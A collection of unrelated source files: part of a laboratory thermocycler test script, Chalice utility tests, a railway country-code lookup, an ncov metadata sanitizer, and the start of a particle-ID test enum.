print(di.DeviceName + " locked: " + str(status.Locked))
print(di.DeviceName + " build: " + di.DeviceFirmwareVersion)
print(di.DeviceName + " fw: " + di.DeviceFirmwareVersion[29:32])
legacy = False
if int(di.DeviceFirmwareVersion[29:32]) <= 232:
legacy = True
if not legacy: # skip finder for incompatible older versions
frOdtcs = OdtcFinderWrapper.SearchDevices()
if len(frOdtcs) == 0:
print("No ODTC found")
for val in frOdtcs:
print("Finder result: " + val.Name + " " + str(val.WsdlUri))
# Gather device info before Create()
status2 = PmsWrapper.GetStatus(val.IPv4Address)
print(val.Name + " state: " + status2.State)
print(val.Name + " locked: " + status2.Locked)
(r, di2) = PmsWrapper.GetDeviceIdentification(val.IPv4Address)
assert r.ReturnCode == 1
print("Pre-connect GetDeviceIdentification: " + di2.DeviceName + " " + di2.Wsdl + " " + di2.DeviceFirmwareVersion)
# with pms.Create("http://10.2.2.8/odtc.wsdl") as odtc:
# odtc.Reset()
# odtc.Initialize()
# Download logs and latest trace file
print("Start log/trace download...")
error = DownloadOdtcLogTraces(ip=deviceIp, path="/home/for/dev/logDownload/" + di.DeviceName, traceFileCount=1, logs=True, legacy=legacy)
assert(error is None)
print("log/trace download finished")
# Create device
try:
odtc = pms.Create("http://" + deviceIp + "/odtc.wsdl")
except Exception as ex:
if (ex.Message) == "Invalid lockId.":
odtc = pms.Create("http://" + deviceIp + "/odtc.wsdl", "myLockId")
else:
raise
# Register Callback(s)
odtc.RegisterStatusEventCallback(OnStatusEvent)
odtc.RegisterDataEventCallback(OnDataEvent)
print("Device Name: " + odtc.DeviceName)
print("Current LockId: " + str(odtc.LockId))
di = GetDeviceIdentification(odtc)
if legacy == False:
assert di.DeviceName == odtc.DeviceName
else:
assert di.DeviceName == "ODTC"
s = GetStatus(odtc)
assert s.State != "InError"
rv = odtc.Reset()
assert rv.Success == True
# if rv.Success == False:
# print("ODTC Reset error: " + rv.Message)
# print("Exit")
# #return
# exit()
s = GetStatus(odtc)
assert s.State == "Standby"
# Lock device
odtc.LockId = "myLockId"
rv = odtc.LockDevice()
assert rv.Success == True
# Test lock
s = GetStatus(odtc)
assert s.Locked == True
odtc.LockId = None # Set Wrong lockId
rv = odtc.GetConfiguration()
assert rv.Success == False
# Unlock device
odtc.LockId = "myLockId"
rv = odtc.UnlockDevice()
assert rv.Success == True
s = GetStatus(odtc)
assert s.Locked == False
rv = odtc.GetConfiguration()
assert rv.Success == True
print(rv.ResponseData.LogLevel)
print(rv.ResponseData.NetworkConfig)
print(rv.ResponseData.SoapCompression)
print(rv.ResponseData.SysDateTime)
print(rv.ResponseData.UseDeviceClassDateTime)
cx = OdtcConfigXmlWrapper()
cx.ImportNetworkConfigXml("dhcp.xml")
print(cx.GetParamsXml())
rv = odtc.SetConfiguration(cx.GetParamsXml())
assert rv.Success == True
rv = odtc.Initialize()
assert rv.Success == True
rv = odtc.StopMethod()
assert rv.Success == True
time.sleep(0.1) # workaround odtc reports State==Busy
s = GetStatus(odtc)
assert s.State == "Idle"
rv = odtc.GetParameters()
assert rv.Success == True
print(rv.ResponseData.CSVSeparatorCharacter)
print(rv.ResponseData.DynamicPreMethodDuration)
print(rv.ResponseData.ExecuteMethodDataEvent)
print(rv.ResponseData.MatchLidTemperatures)
print(rv.ResponseData.MethodsXML)
for pm in rv.ResponseData.GetPreMethodNames():
print(pm)
for m in rv.ResponseData.GetMethodNames():
print(m)
px = OdtcParamsXmlWrapper()
px.ImportMethodSetXml("methodSet-example.xml")
print(px.GetParamsXml())
rv = odtc.SetParameters(px.GetParamsXml())
assert rv.Success == True
rv = odtc.StopMethod()
assert rv.Success == True
rv = odtc.GetLastData()
assert rv.Success == True
print(rv.ResponseData.Name)
print(rv.ResponseData.Data)
rv = odtc.ReadActualTemperature()
assert rv.Success == True
at = rv.ResponseData.SensorValues
print("Mount: " + str(at.Mount / 100))
print("Lid: " + str(at.Lid / 100))
print(at)
t = threading.Thread(target=PollRAT, args=(odtc,))
t.start()
print("ExecuteMethod")
rv = odtc.ExecuteMethod("PRE25")
assert rv.Success == True # PollRat-Thread invokes StopMethod() after x iterations
print("ExecuteMethod finished")
print("OpenDoor")
rv = odtc.OpenDoor()
assert rv.Success == True
print("OpenDoor finished")
print("CloseDoor")
rv = odtc.CloseDoor()
assert rv.Success == True
print("CloseDoor finished")
t.join()
print(odtc.DeviceName + " dispose")
odtc.Dispose()
#input("Press Enter to continue...")
print("Exit")
def GetStatus(device: DeviceWrapper) -> StatusWrapper:
if device is None:
raise TypeError
(r, s) = device.GetStatus()
assert r.ReturnCode == 1
logging.debug(s.DeviceId + " " + s.CurrentTime + " " + str(s.Locked) + (" " + s.PMSId if s.PMSId else "") + " " + s.State)
#logging.debug(s.SubStates)
return s
def GetDeviceIdentification(device: DeviceWrapper) -> DeviceIdentificationWrapper:
if device is None:
raise TypeError
(r, di) = device.GetDeviceIdentification()
assert r.ReturnCode == 1
logging.debug(di.DeviceName + " " + di.DeviceSerialNumber + " " + di.DeviceFirmwareVersion + " " + di.DeviceManufacturer + " " + di.Wsdl + " " + str(di.SiLADeviceClass))
return di
def OnStatusEvent(sea: StatusEventArgsWrapper):
assert sea is not None
print(sea.EventDescription.Classification + " received from " + sea.Device.DeviceName + ": ")
#print(str(sea.ReturnValue.ReturnCode) + " " + sea.ReturnValue.Message.split("\r\n", 1)[0] + " (Code " + str(sea.InternalErrorCode) + " " + sea.EventDescription.Raw + ")")
print(str(sea.ReturnValue.ReturnCode) + " " + sea.EventDescription.StatusMessage + " (Code " + str(sea.EventDescription.InternalCode) + " " + sea.EventDescription.InternalCodeName + " " + sea.EventDescription.InternalCodeDescription + ")")
print("Correction hint: " + sea.EventDescription.FaultCorrectionsHints)
if config['IHC']['ODTC'] == "True":
def OnDataEvent(dataEventSensorValues: List[DataEventOdtcSensorValue]):
#val: DataEventOdtcSensorValue
for val in dataEventSensorValues:
print(val)
print("OnDataEvent called")
if config['IHC']['ODTC'] == "True":
def PollRAT(odtc: OdtcWrapper, iterations = 5):
assert odtc != None
i = 0
while i < iterations:
rv = odtc.ReadActualTemperature()
assert rv.Success == True
at = rv.ResponseData.SensorValues
print("Async Polling RAT - Mount: " + str(at.Mount / 100))
time.sleep(1)
i += 1
# Test SubStates (parallel command processing)
di = GetStatus(odtc)
for value in di.SubStates:
print("SubStates: " + value.CommandName + " " + str(value.RequestId) + " " + value.CurrentState + " " + str(value.QueuePosition) + " " + value.StartedAt)
print("StopMethod (from PollRAT)")
res = odtc.StopMethod()
assert res.Success == True
if config['IHC']['ODTC'] == "True":
def DownloadOdtcLogTraces(ip: str, path: str, traceFileCount: int, logs: bool = True, legacy: bool = False):
assert ip != None
assert path != None
downloader = OdtcDownloaderWrapper()
if logs:
if legacy:
# Download device logs
items = downloader.GetItems(ip, "Logs")
for item in items:
if item.Value != "InhecoSiLA.log":
item.Download = True
error = downloader.DownloadFtpItems(items, path)
if error is not None:
return error
else:
# Download SiLA logs
items = downloader.GetItems(ip, "SiLA")
for item in items:
item.Download = True
error = downloader.DownloadFtpItems(items, path)
if error is not None:
return error
# Download device logs
items = downloader.GetItems(ip, "Odtc")
for item in items:
item.Download = True
error = downloader.DownloadFtpItems(items, path)
if error is not None:
return error
# Download traces files
if traceFileCount == 0:
return None
items = downloader.GetItems(ip, "Traces")
traces = [x for x in items if x.IsTrace == True]
def TakeValue(item):
return item.Value
traces.sort(key=TakeValue, reverse=True)
for idx, x in enumerate(traces):
if idx < traceFileCount or traceFileCount < 0:
traces[idx].Download = True
else:
break
return downloader.DownloadFtpItems(traces, path)
if config['IHC']['SCILA'] == "True":
def DownloadScilaLogTraces(ip: str, path: str, traceFileCount: int, logs: bool = True) -> str:
assert ip != None
assert path != None
downloader = ScilaDownloaderWrapper()
if logs:
# Download SiLA logs
items = downloader.GetItems(ip, "SiLA")
for item in items:
item.Download = True
error = downloader.DownloadFtpItems(items, path)
if error is not None:
return error
# Download device logs
items = downloader.GetItems(ip, "Scila/Logs")
for item in items:
item.Download = True
error = downloader.DownloadFtpItems(items, path)
if error is not None:
return error
# Download traces files
if traceFileCount == 0:
return None
items = downloader.GetItems(ip, "Scila/Traces")
traces = [x for x in items if x.IsTrace == True]
def TakeNumber(item: FtpItemWrapper):
return int(item.Value[7: item.Value.index(".")])
traces.sort(key=TakeNumber, reverse=True)
for idx, x in enumerate(traces):
if idx < traceFileCount or traceFileCount < 0:
traces[idx].Download = True
else:
break
return downloader.DownloadFtpItems(traces, path)
if __name__ == "__main__":
main()
|
<reponame>Chen188/chalice
import os
import re
import mock
import sys
import click
import pytest
from six import StringIO
from hypothesis.strategies import text
from hypothesis import given
import string
from dateutil import tz
from datetime import datetime
from chalice import utils
class TestUI(object):
def setup(self):
self.out = StringIO()
self.err = StringIO()
self.ui = utils.UI(self.out, self.err)
def test_write_goes_to_out_obj(self):
self.ui.write("Foo")
assert self.out.getvalue() == 'Foo'
assert self.err.getvalue() == ''
def test_error_goes_to_err_obj(self):
self.ui.error("Foo")
assert self.err.getvalue() == 'Foo'
assert self.out.getvalue() == ''
def test_confirm_raises_own_exception(self):
confirm = mock.Mock(spec=click.confirm)
confirm.side_effect = click.Abort()
ui = utils.UI(self.out, self.err, confirm)
with pytest.raises(utils.AbortedError):
ui.confirm("Confirm?")
def test_confirm_returns_value(self):
confirm = mock.Mock(spec=click.confirm)
confirm.return_value = 'foo'
ui = utils.UI(self.out, self.err, confirm)
return_value = ui.confirm("Confirm?")
assert return_value == 'foo'
class TestChaliceZip(object):
def test_chalice_zip_file(self, tmpdir):
tmpdir.mkdir('foo').join('app.py').write('# Test app')
zip_path = tmpdir.join('app.zip')
app_filename = str(tmpdir.join('foo', 'app.py'))
# Add an executable file to test preserving permissions.
script_obj = tmpdir.join('foo', 'myscript.sh')
script_obj.write('echo foo')
script_file = str(script_obj)
os.chmod(script_file, 0o755)
with utils.ChaliceZipFile(str(zip_path), 'w') as z:
z.write(app_filename)
z.write(script_file)
with utils.ChaliceZipFile(str(zip_path)) as z:
assert len(z.infolist()) == 2
# Remove the leading '/'.
app = z.getinfo(app_filename[1:])
assert app.date_time == (1980, 1, 1, 0, 0, 0)
assert app.external_attr >> 16 == os.stat(app_filename).st_mode
# Verify executable permission is preserved.
script = z.getinfo(script_file[1:])
assert script.date_time == (1980, 1, 1, 0, 0, 0)
assert script.external_attr >> 16 == os.stat(script_file).st_mode
class TestPipeReader(object):
def test_pipe_reader_does_read_pipe(self):
mock_stream = mock.Mock(spec=sys.stdin)
mock_stream.isatty.return_value = False
mock_stream.read.return_value = 'foobar'
reader = utils.PipeReader(mock_stream)
value = reader.read()
assert value == 'foobar'
def test_pipe_reader_does_not_read_tty(self):
mock_stream = mock.Mock(spec=sys.stdin)
mock_stream.isatty.return_value = True
mock_stream.read.return_value = 'foobar'
reader = utils.PipeReader(mock_stream)
value = reader.read()
assert value is None
def test_serialize_json():
assert utils.serialize_to_json({'foo': 'bar'}) == (
'{\n'
' "foo": "bar"\n'
'}\n'
)
@pytest.mark.parametrize('name,cfn_name', [
('f', 'F'),
('foo', 'Foo'),
('foo_bar', 'FooBar'),
('foo_bar_baz', 'FooBarBaz'),
('F', 'F'),
('FooBar', 'FooBar'),
('S3Bucket', 'S3Bucket'),
('s3Bucket', 'S3Bucket'),
('123', '123'),
('foo-bar-baz', 'FooBarBaz'),
('foo_bar-baz', 'FooBarBaz'),
('foo-bar_baz', 'FooBarBaz'),
# Not actually possible, but we should
# ensure we only have alphanumeric chars.
('foo_bar!?', 'FooBar'),
('_foo_bar', 'FooBar'),
])
def test_to_cfn_resource_name(name, cfn_name):
assert utils.to_cfn_resource_name(name) == cfn_name
@given(name=text(alphabet=string.ascii_letters + string.digits + '-_'))
def test_to_cfn_resource_name_properties(name):
try:
result = utils.to_cfn_resource_name(name)
except ValueError:
# This is acceptable, the function raises ValueError
# on bad input.
pass
else:
assert re.search('[^A-Za-z0-9]', result) is None
class TestTimestampUtils(object):
def setup(self):
self.mock_now = mock.Mock(spec=datetime.utcnow)
self.set_now()
self.timestamp_convert = utils.TimestampConverter(self.mock_now)
def set_now(self, year=2020, month=1, day=1, hour=0, minute=0, sec=0):
self.now = datetime(
year, month, day, hour, minute, sec, tzinfo=tz.tzutc())
self.mock_now.return_value = self.now
def test_iso_no_timezone(self):
assert self.timestamp_convert.timestamp_to_datetime(
'2020-01-01T00:00:01.000000') == datetime(2020, 1, 1, 0, 0, 1)
def test_iso_with_timezone(self):
assert (
self.timestamp_convert.timestamp_to_datetime(
'2020-01-01T00:00:01.000000-01:00'
) == datetime(2020, 1, 1, 0, 0, 1, tzinfo=tz.tzoffset(None, -3600))
)
def test_to_datetime_relative_second(self):
self.set_now(sec=2)
assert (
self.timestamp_convert.timestamp_to_datetime('1s') ==
datetime(2020, 1, 1, 0, 0, 1, tzinfo=tz.tzutc())
)
def test_to_datetime_relative_multiple_seconds(self):
self.set_now(sec=5)
assert (
self.timestamp_convert.timestamp_to_datetime('2s') ==
datetime(2020, 1, 1, 0, 0, 3, tzinfo=tz.tzutc())
)
def test_to_datetime_relative_minute(self):
self.set_now(minute=2)
assert (
self.timestamp_convert.timestamp_to_datetime('1m') ==
datetime(2020, 1, 1, 0, 1, 0, tzinfo=tz.tzutc())
)
def test_to_datetime_relative_hour(self):
self.set_now(hour=2)
assert (
self.timestamp_convert.timestamp_to_datetime('1h') ==
datetime(2020, 1, 1, 1, 0, 0, tzinfo=tz.tzutc())
)
def test_to_datetime_relative_day(self):
self.set_now(day=3) # 1970-01-03
assert (
self.timestamp_convert.timestamp_to_datetime('1d') ==
datetime(2020, 1, 2, 0, 0, 0, tzinfo=tz.tzutc())
)
def test_to_datetime_relative_week(self):
self.set_now(day=14)
assert (
self.timestamp_convert.timestamp_to_datetime('1w') ==
datetime(2020, 1, 7, 0, 0, 0, tzinfo=tz.tzutc())
)
@pytest.mark.parametrize('timestamp,expected', [
('2020-01-01', datetime(2020, 1, 1)),
('2020-01-01T00:00:01', datetime(2020, 1, 1, 0, 0, 1)),
('2020-02-02T01:02:03', datetime(2020, 2, 2, 1, 2, 3)),
('2020-01-01T00:00:00Z', datetime(2020, 1, 1, 0, 0, tzinfo=tz.tzutc())),
('2020-01-01T00:00:00-04:00', datetime(2020, 1, 1, 0, 0, 0,
tzinfo=tz.tzoffset('EDT', -14400))),
])
def test_parse_iso8601_timestamp(timestamp, expected):
timestamp_convert = utils.TimestampConverter()
assert timestamp_convert.parse_iso8601_timestamp(timestamp) == expected
|
<reponame>neilalbrock/python-uic920<gh_stars>1-10
# -*- coding: utf-8 -*-
import re
from numbers import Integral
from collections import namedtuple
__all__ = ["countries"]
Country = namedtuple('Country', 'name, iso, uic')
_records = [
Country(u"Finland", "FI", "10"),
Country(u"Russian Federation", "RU", "20"),
Country(u"Belarus", "BY", "21"),
Country(u"Ukraine", "UA", "22"),
Country(u"Moldova, Republic of", "MD", "23"),
Country(u"Lithuania", "LT", "24"),
Country(u"Latvia", "LV", "25"),
Country(u"Estonia", "EE", "26"),
Country(u"Kazakhstan", "KZ", "27"),
Country(u"Georgia", "GE", "28"),
Country(u"Uzbekistan", "UZ", "29"),
Country(u"Korea, Democratic People's Republic of", "KP", "30"),
Country(u"Mongolia", "MN", "31"),
Country(u"Viet nam", "VN", "32"),
Country(u"China", "CN", "33"),
Country(u"Cuba", "CU", "40"),
Country(u"Albania", "AL", "41"),
Country(u"Japan", "JP", "42"),
Country(u"Bosnia and Herzegovina, Serb Republic of ", "BA", "44"),
Country(u"Bosnia and Herzegovina, Muslim-Croat Federation of ", "BA", "50"),
Country(u"Poland", "PL", "51"),
Country(u"Bulgaria", "BG", "52"),
Country(u"Romania", "RO", "53"),
Country(u"Czech Republic", "CZ", "54"),
Country(u"Hungary", "HU", "55"),
Country(u"Slovakia", "SK", "56"),
Country(u"Azerbaijan", "AZ", "57"),
Country(u"Armenia", "AM", "58"),
Country(u"Kyrgyzstan", "KG", "59"),
Country(u"Ireland", "IE", "60"),
Country(u"Korea, Republic of", "KR", "61"),
Country(u"Montenegro", "ME", "62"),
Country(u"Macedonia, The former Yugoslav Republic of", "MK", "65"),
Country(u"Tajikistan", "TJ", "66"),
Country(u"Turkmenistan", "TM", "67"),
Country(u"United Kingdom of Great Britain and Northern Ireland", "GB", "70"),
Country(u"Spain", "ES", "71"),
Country(u"Serbia", "RS", "72"),
Country(u"Greece", "GR", "73"),
Country(u"Sweden", "SE", "74"),
Country(u"Turkey", "TR", "75"),
Country(u"Norway", "NO", "76"),
Country(u"Croatia", "HR", "78"),
Country(u"Slovenia", "SI", "79"),
Country(u"Germany", "DE", "80"),
Country(u"Austria", "AT", "81"),
Country(u"Luxemburg", "LU", "82"),
Country(u"Italy", "IT", "83"),
Country(u"Netherlands", "NL", "84"),
Country(u"Switzerland", "CH", "85"),
Country(u"Denmark", "DK", "86"),
Country(u"France", "FR", "87"),
Country(u"Belgium", "BE", "88"),
Country(u"Egypt", "EG", "90"),
Country(u"Tunesia", "TN", "91"),
Country(u"Algeria", "DZ", "92"),
Country(u"Morocco", "MA", "93"),
Country(u"Portugal", "PT", "94"),
Country(u"Israel", "IL", "95"),
Country(u"Iran, Islamic Republic of", "IR", "96"),
Country(u"Syrian Arab Republic", "SY", "97"),
Country(u"Lebanon", "LB", "98"),
Country(u"Iraq", "IQ", "99")]
def _build_index(idx):
return dict((r[idx], r) for r in _records)
_by_iso = _build_index(1)
_by_uic = _build_index(2)
class _CountryLookup(object):
def get (self, key):
if isinstance(key, Integral):
return _by_uic["%d" % key]
k = key.upper()
if len(k) == 2 and re.match(r"[0-9]{2}", k):
return _by_uic[k]
elif len(k) == 2:
return _by_iso[k]
raise ValueError()
def __iter__(self):
return iter(_records)
countries = _CountryLookup() |
<reponame>jkmcpherson/ncov
import argparse
from augur.io import open_file, read_metadata
import csv
import os
from pathlib import Path
import pandas as pd
import re
import sys
from tempfile import NamedTemporaryFile
from utils import extract_tar_file_contents
# Define all possible geographic scales we could expect in the GISAID location
# field.
LOCATION_FIELDS = (
"region",
"country",
"division",
"location",
)
class MissingColumnException(Exception):
"""An exception caused by a missing column that was expected in the metadata.
"""
pass
class DuplicateException(Exception):
"""An exception caused by the presence of any duplicate metadata records by
strain name.
"""
pass
def parse_new_column_names(renaming_rules):
"""Parse the mapping of current to new column names from the given list of renaming rules.
Parameters
----------
renaming_rules : list[str]
A list of strings mapping an old column name to a new one delimited by an equal symbol (e.g., "old_column=new_column").
Returns
-------
dict :
A mapping of new column names for each old column name.
>>> parse_new_column_names(["old=new", "new=old"])
{'old': 'new', 'new': 'old'}
>>> parse_new_column_names(["old->new"])
{}
"""
new_column_names = {}
for rule in renaming_rules:
if "=" in rule:
old_column, new_column = rule.split("=")
new_column_names[old_column] = new_column
else:
print(
f"WARNING: missing mapping of old to new column in form of 'Virus name=strain' for rule: '{rule}'.",
file=sys.stderr
)
return new_column_names
def parse_location_string(location_string, location_fields):
"""Parse location string from GISAID into the given separate geographic scales
and return a dictionary of parse values by scale.
Parameters
----------
location_string : str
location_fields : list
Returns
-------
dict :
dictionary of geographic fields parsed from the given string
>>> location_fields = ["region", "country", "division", "location"]
>>> parse_location_string("Asia / Japan", location_fields)
{'region': 'Asia', 'country': 'Japan', 'division': '?', 'location': '?'}
>>> parse_location_string("Europe / Iceland / Reykjavik", location_fields)
{'region': 'Europe', 'country': 'Iceland', 'division': 'Reykjavik', 'location': '?'}
>>> parse_location_string("North America / USA / Washington / King County", location_fields)
{'region': 'North America', 'country': 'USA', 'division': 'Washington', 'location': 'King County'}
Additional location entries beyond what has been specified should be stripped from output.
>>> parse_location_string("North America / USA / Washington / King County / Extra field", location_fields)
{'region': 'North America', 'country': 'USA', 'division': 'Washington', 'location': 'King County'}
Trailing location delimiters should be stripped from the output.
>>> parse_location_string("North America / USA / Washington / King County / ", location_fields)
{'region': 'North America', 'country': 'USA', 'division': 'Washington', 'location': 'King County'}
Handle inconsistently delimited strings.
>>> parse_location_string("North America/USA/New York/New York", location_fields)
{'region': 'North America', 'country': 'USA', 'division': 'New York', 'location': 'New York'}
>>> parse_location_string("Europe/ Lithuania", location_fields)
{'region': 'Europe', 'country': 'Lithuania', 'division': '?', 'location': '?'}
"""
# Try to extract values for specific geographic scales.
values = re.split(r"[ ]*/[ ]*", location_string)
# Create a default mapping of location fields to missing values and update
# these from the values in the location string.
locations = {field: "?" for field in location_fields}
locations.update(dict(zip(location_fields, values)))
return locations
def strip_prefixes(strain_name, prefixes):
"""Strip the given prefixes from the given strain name.
Parameters
----------
strain_name : str
Name of a strain to be sanitized
prefixes : list[str]
A list of prefixes to be stripped from the strain name.
Returns
-------
str :
Strain name without any of the given prefixes.
>>> strip_prefixes("hCoV-19/RandomStrain/1/2020", ["hCoV-19/", "SARS-CoV-2/"])
'RandomStrain/1/2020'
>>> strip_prefixes("SARS-CoV-2/RandomStrain/2/2020", ["hCoV-19/", "SARS-CoV-2/"])
'RandomStrain/2/2020'
>>> strip_prefixes("hCoV-19/RandomStrain/1/2020", ["SARS-CoV-2/"])
'hCoV-19/RandomStrain/1/2020'
"""
joined_prefixes = "|".join(prefixes)
pattern = f"^({joined_prefixes})"
return re.sub(pattern, "", strain_name)
def get_database_ids_by_strain(metadata_file, metadata_id_columns, database_id_columns, metadata_chunk_size, error_on_duplicates=False):
"""Get a mapping of all database ids for each strain name.
Parameters
----------
metadata_file : str or Path-like or file object
Path or file object for a metadata file to process.
metadata_id_columns : list[str]
A list of potential id columns for strain names in the metadata.
database_id_columns : list[str]
A list of potential database id columns whose values can be used to deduplicate records with the same strain name.
metadata_chunk_size : int
Number of records to read into memory at once from the metadata.
error_on_duplicates : bool
Throw an error when duplicate records are detected.
Returns
-------
str or Path-like or file object or None :
Path or file object containing the mapping of database ids for each
strain name (one row per combination). Returns None, if no valid
database ids were found and no duplicates exist.
Raises
------
DuplicateException :
When duplicates are detected and the caller has requested an error on duplicates.
Exception :
When none of the requested metadata id columns exist.
"""
metadata_reader = read_metadata(
metadata_file,
id_columns=metadata_id_columns,
chunk_size=metadata_chunk_size,
)
# Track strains we have observed, so we can alert the caller to duplicate
# strains when an error on duplicates has been requested.
observed_strains = set()
duplicate_strains = set()
with NamedTemporaryFile(delete=False, mode="wt", newline='') as mapping_file:
mapping_path = mapping_file.name
header = True
for metadata in metadata_reader:
# Check for database id columns.
valid_database_id_columns = metadata.columns.intersection(
database_id_columns
)
if mapping_path and len(valid_database_id_columns) == 0:
# Do not write out mapping of ids. Default to error on
# duplicates, since we have no way to resolve duplicates
# automatically.
mapping_path = None
error_on_duplicates = True
print(
"WARNING: Skipping deduplication of metadata records.",
f"None of the possible database id columns ({database_id_columns}) were found in the metadata's columns {tuple([metadata.index.name] + metadata.columns.values.tolist())}",
file=sys.stderr
)
# Track duplicates in memory, as needed.
if error_on_duplicates:
for strain in metadata.index.values:
if strain in observed_strains:
duplicate_strains.add(strain)
else:
observed_strains.add(strain)
if mapping_path:
# Write mapping of database and strain ids to disk.
metadata.loc[:, valid_database_id_columns].to_csv(
mapping_file,
sep="\t",
header=header,
index=True,
)
header = False
# Clean up temporary file.
if mapping_path is None:
os.unlink(mapping_file.name)
if error_on_duplicates and len(duplicate_strains) > 0:
duplicates_file = metadata_file + ".duplicates.txt"
with open(duplicates_file, "w") as oh:
for strain in duplicate_strains:
oh.write(f"{strain}\n")
raise DuplicateException(f"{len(duplicate_strains)} strains have duplicate records. See '{duplicates_file}' for more details.")
return mapping_path
def filter_duplicates(metadata, database_ids_by_strain):
"""Filter duplicate records by the strain name in the given data frame index
using the given file containing a mapping of strain names to database ids.
Database ids allow us to identify duplicate records that need to be
excluded. We prefer the latest record for a given strain name across all
possible database ids and filter out all other records for that same strain
name.
Parameters
----------
metadata : pandas.DataFrame
A data frame indexed by strain name.
database_ids_by_strain : str or Path-like or file object
Path or file object containing the mapping of database ids for each strain name (one row per combination).
Returns
-------
pandas.DataFrame :
A filtered data frame with no duplicate records.
"""
# Get strain names for the given metadata.
strain_ids = set(metadata.index.values)
# Get the mappings of database ids to strain names for the current strains.
with open(database_ids_by_strain, "r") as fh:
reader = csv.DictReader(fh, delimiter="\t")
# The mapping file stores the strain name in the first column. All other
# fields are database ids.
strain_field = reader.fieldnames[0]
database_id_columns = reader.fieldnames[1:]
# Keep only records matching the current strain ids.
mappings = pd.DataFrame([
row
for row in reader
if row[strain_field] in strain_ids
])
# Check for duplicate strains in the given metadata. If there are none,
# return the metadata as it is. If duplicates exist, filter them out.
if any(mappings.duplicated(strain_field)):
# Create a list of database ids of records to keep. To this end, we sort by
# database ids in descending order such that the latest record appears
# first, then we take the first record for each strain name.
records_to_keep = mappings.sort_values(
database_id_columns,
ascending=False
).groupby(strain_field).first()
# Select metadata corresponding to database ids to keep.
metadata = metadata.reset_index().merge(
records_to_keep,
on=database_id_columns,
validate="1:1",
).set_index(strain_field)
return metadata
if __name__ == '__main__':
parser = argparse.ArgumentParser(
usage="Sanitize metadata from different sources, applying operations (deduplicate, parse location field, strip prefixes, and rename fields) in the same order they appear in the full help (-h).",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("--metadata", required=True, help="metadata to be sanitized")
parser.add_argument("--metadata-id-columns", default=["strain", "name", "Virus name"], nargs="+", help="names of valid metadata columns containing identifier information like 'strain' or 'name'")
parser.add_argument("--database-id-columns", default=["Accession ID", "gisaid_epi_isl", "genbank_accession"], nargs="+", help="names of metadata columns that store external database ids for each record (e.g., GISAID, GenBank, etc.) that can be used to deduplicate metadata records with the same strain names.")
parser.add_argument("--metadata-chunk-size", type=int, default=100000, help="maximum number of metadata records to read into memory at a time. Increasing this number can speed up filtering at the cost of more memory used.")
parser.add_argument("--error-on-duplicate-strains", action="store_true", help="exit with an error if any duplicate strains are found. By default, duplicates are resolved by preferring most recent accession id or the last record.")
parser.add_argument("--parse-location-field", help="split the given GISAID location field on '/' and create new columns for region, country, etc. based on available data. Replaces missing geographic data with '?' values.")
parser.add_argument("--strip-prefixes", nargs="+", help="prefixes to strip from strain names in the metadata")
parser.add_argument("--rename-fields", nargs="+", help="rename specific fields from the string on the left of the equal sign to the string on the right (e.g., 'Virus name=strain')")
parser.add_argument("--output", required=True, help="sanitized metadata")
args = parser.parse_args()
# Get user-defined metadata id columns to look for.
metadata_id_columns = args.metadata_id_columns
# Get user-defined database id columns to use for deduplication.
database_id_columns = args.database_id_columns
# If the input is a tarball, try to find a metadata file inside the archive.
metadata_file = args.metadata
metadata_is_temporary = False
if ".tar" in Path(args.metadata).suffixes:
try:
temporary_dir, metadata_file = extract_tar_file_contents(
args.metadata,
"metadata"
)
metadata_is_temporary = True
except FileNotFoundError as error:
print(f"ERROR: {error}", file=sys.stderr)
sys.exit(1)
# In the first pass through the metadata, map strain names to database ids.
# We will use this mapping to deduplicate records in the second pass.
# Additionally, this pass checks for missing id columns and the presence of
# any duplicate records, in case the user has requested an error on
# duplicates.
try:
database_ids_by_strain = get_database_ids_by_strain(
metadata_file,
metadata_id_columns,
database_id_columns,
args.metadata_chunk_size,
args.error_on_duplicate_strains,
)
except (DuplicateException, Exception) as error:
print(f"ERROR: {error}", file=sys.stderr)
sys.exit(1)
# Parse mapping of old column names to new.
rename_fields = args.rename_fields if args.rename_fields else []
new_column_names = parse_new_column_names(rename_fields)
# In the second pass through the metadata, filter duplicate records,
# transform records with requested sanitizer steps, and stream the output to
# disk.
metadata_reader = read_metadata(
metadata_file,
id_columns=metadata_id_columns,
chunk_size=args.metadata_chunk_size,
)
emit_header = True
with open_file(args.output, "w") as output_file_handle:
for metadata in metadata_reader:
if database_ids_by_strain:
# Filter duplicates.
metadata = filter_duplicates(
metadata,
database_ids_by_strain,
)
# Reset the data frame index, to make the "strain" column available
# for transformation.
strain_field = metadata.index.name
metadata = metadata.reset_index()
# Parse GISAID location field into separate fields for geographic
# scales. Replace missing field values with "?".
if args.parse_location_field and args.parse_location_field in metadata.columns:
locations = pd.DataFrame(
(
parse_location_string(location, LOCATION_FIELDS)
for location in metadata[args.parse_location_field].values
)
)
# Combine new location columns with original metadata and drop the
# original location column.
metadata = pd.concat(
[
metadata,
locations
],
axis=1
).drop(columns=[args.parse_location_field])
# Strip prefixes from strain names.
if args.strip_prefixes:
metadata[strain_field] = metadata[strain_field].apply(
lambda strain: strip_prefixes(strain, args.strip_prefixes)
)
# Replace whitespaces from strain names with underscores to match GISAID's
# convention since whitespaces are not allowed in FASTA record names.
metadata[strain_field] = metadata[strain_field].str.replace(" ", "_")
# Rename columns as needed, after transforming strain names. This
# allows us to avoid keeping track of a new strain name field
# provided by the user.
if len(new_column_names) > 0:
metadata = metadata.rename(columns=new_column_names)
# Write filtered and transformed metadata to the output file.
metadata.to_csv(
output_file_handle,
sep="\t",
index=False,
header=emit_header,
)
emit_header = False
if database_ids_by_strain:
# Delete the database/strain id mapping.
os.unlink(database_ids_by_strain)
# Clean up temporary directory and files that came from a tarball.
if metadata_is_temporary:
print(f"Cleaning up temporary files in {temporary_dir.name}", file=sys.stderr)
temporary_dir.cleanup()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, <NAME> and <NAME>.
#
# Distributed under the 3-clause BSD license, see accompanying file LICENSE
# or https://github.com/scikit-hep/particle for details.
import pytest
# Backport needed if Python 2 is used
from enum import IntEnum
class PDGIDsEnum(IntEnum):
"""Sample of PDGIDs on which to run tests."""
# Gauge and Higgs bosons
Gluon = 21
Photon = 22
Z0 = 23
WMinus = -24
HiggsBoson = 25
ZPrime = 32
# Charged leptons
Electron = 11
Positron = -Electron
Muon = 13
AntiMuon = -Muon
Tau = 15
TauPrime = 17
# Neutrinos
Nu_e = 12
NuBar_tau = -16
# Quarks
DQuark = 1
UQuark = 2
SQuark = 3
CQuark = 4
BQuark = 5
